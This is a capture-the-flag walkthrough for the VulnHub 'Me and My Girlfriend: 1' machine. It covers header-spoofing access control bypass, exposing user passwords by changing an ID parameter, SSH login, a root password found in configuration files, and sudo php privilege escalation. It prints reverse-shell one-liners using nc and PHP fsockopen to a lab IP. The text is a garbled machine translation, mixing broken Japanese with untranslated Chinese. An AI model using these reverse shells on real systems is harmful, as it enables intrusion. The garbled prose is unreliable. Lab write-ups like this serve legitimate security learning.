No.47-VulnHub-私と私のガールフレンド:1 - チュートリアル浸透研究

**

VulnHub - 私と私のガールフレンド:1 - チュートリアル

**

ドローンアドレスします。https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
ドローン難易度:中級(CTF)
ドローン発売日:2019年12月13日
ドローン説明:
セルフブルドッグ産業が被ったため、データ侵害は、数年経過しています。その時、彼らは復元され、Bulldog.social名前が変更されました、これは新興のソーシャルメディア企業です。あなたは、この新しい挑戦を受け入れ、それらの生産のWebサーバー上にルートを取ることができますか?
これは、ルートへの標準的なスタートです。あなたの唯一の目標は、ルートディレクトリを入力して、あなたはどのように依存してお祝いのメッセージを、表示することです!
難易度:中級、あなたが前に見たことがないかもしれないいくつかの事。慎重にすべての問題:)考える
:著者太夫
時間:2020年2月7日
注:これらのすべてのコンピュータでは、私は、VMwareを実行しているコンピュータを使用してダウンロードしました。私は、攻撃者のマシンCTFに対する解決策として、カーリーのLinuxを使用します。ここだけの教育目的のために学習するための技術の使用は、技術は他の目的のためにリストされている場合、私は責任を負いかねます。

まず、情報収集

ここに画像を挿入説明
私たちは、宛先IPアドレスを取得するVMのIPアドレス、使用nmapの中に標的を同定する必要があります:
ここに画像を挿入説明
192.168.56.142:我々は、CTFのターゲットコンピュータのIPアドレスを見つけた
ここに画像を挿入説明
開いているポート22を見つけるnmapの、80 ...
ここに画像を挿入説明
のみローカルWEBを...アクセスが
ここに画像を挿入説明
使用するX-転送-のためにされてヘッダにアクセスするページ...
ここに画像を挿入説明
ここに画像を挿入説明
使用burpsuite分析は、x-転送-のための注射の使用は通常の訪問することができることを見出したが、ページの各時点迷惑回注射する必要があります... ...私は、プラグイン、ダウンロード
ここに画像を挿入説明
中にDIRB、Niktoの、gobusterとwfuzzがページを列挙するので...ユーザーのパスワードを登録し、登録ページの太夫がスキップ、何も有用な情報です...
あなたは太夫のユーザーのために、プロファイルのタイトルがUSER_IDのように表現されて見ることができ、それがURLに表示されていますユーザID = 12 ...
ここに画像を挿入説明
ここに画像を挿入説明
ここに私の目の前でSQLMAPテスト、そして、何の効果もLFIを使用しないようにしようと使用して...
ここにあなたは私が12 1に入れて見ることができ、選択プロファイルは、eweuhtandinganユーザ名・パスワードが暗号化されて登場し...私はフロントでソースコードの変更を見ることができるようにしてみてください...
ここに画像を挿入説明
ここに画像を挿入説明
あなたはクリアテキストが現れ見ることができ、passwdのテキストを変更:skuyatuh、ユーザー:eweuhtandingan
ここに画像を挿入説明
ユーザー名を取得します。aingmaungパスワード:qwerty配列!!!
ここに画像を挿入説明
オリジナルの作者に戻って、ユーザがアリスの存在を確認することができ、あなたが直接...見つけることができることを示唆する
ここに画像を挿入説明
ユーザーを見つけることに成功しました:アリス、パスワード:4lic3

第二に、言及する権利

ここに画像を挿入説明
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
经过查看,在进来的目录下有两个隐藏文件,进入cache是空的,在my_secret下正常获得了flag1…
ここに画像を挿入説明
我本来想看看html下有什么PHP或者shell能直接利用的…发现了三个隐藏文件,分析下…
ここに画像を挿入説明
???这里看到了root疑似密码:ctf_pasti_bisa,ceban_corp应该是数据库密码? …等会试试,先继续看看…
ここに画像を挿入説明
在halamanPerusahaan隐藏文件中没啥利用的…
ここに画像を挿入説明
在misc中php文件的意思就是访问login或者register是login就执行…等等…没啥用
ここに画像を挿入説明
这里尝试了三个密码,就只有ctf_pasti_bisa正确登录了…
ここに画像を挿入説明
这些信息都是知道的…没啥用!!!
ここに画像を挿入説明
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
数据库没发现好的信息…直接尝试进root用户,发现成功…成功获得了root权限和查看了flag1和2…
这边前面进来我就习惯的sudo-l,发现还有另外提权的方法,继续讲…
ここに画像を挿入説明
(root) NOPASSWD: /usr/bin/php
可以看到这里的php可以提权…将php置于交互模式,并执行一个反向shell即可提权…go (这里shell随便写就是,非常多方法)
ここに画像を挿入説明
命令:sudo .... -a
命令:echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.103 443 >/tmp/f");
成功提权…另附上:php提权参考链接

推荐链接里的:php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
挺好用的,或者CMD等等…

ここで私は右を提供するために、2つのメソッドを使用し...私は意志を解析し、未発見の他がある場合は、教えてください、ありがとうございました、一緒に学び、来ることを期待して、他の方法を見つけることができませんでした!

我々はこのようにシンプルなドローンを完了し、フラグを表示するために成功したroot権限をされているので、私はこのマシンのようなあなたを願って、学ぶための演習と一緒に、後半以上の機械より挑戦があるだろう大に注力することを続けてください。

あなたはウェルカムメッセージの他の方法を持っている場合。そこに間違った場所ならば、あなたは私に言う必要があります。あなたが書き込み良いにこのブログを見つけた場合は、周りの人々を共有することを歓迎します。

ここに画像を挿入説明

公開された54元の記事 ウォンの賞賛9 ビュー10000 +

おすすめ

転載: blog.csdn.net/qq_34801745/article/details/104210622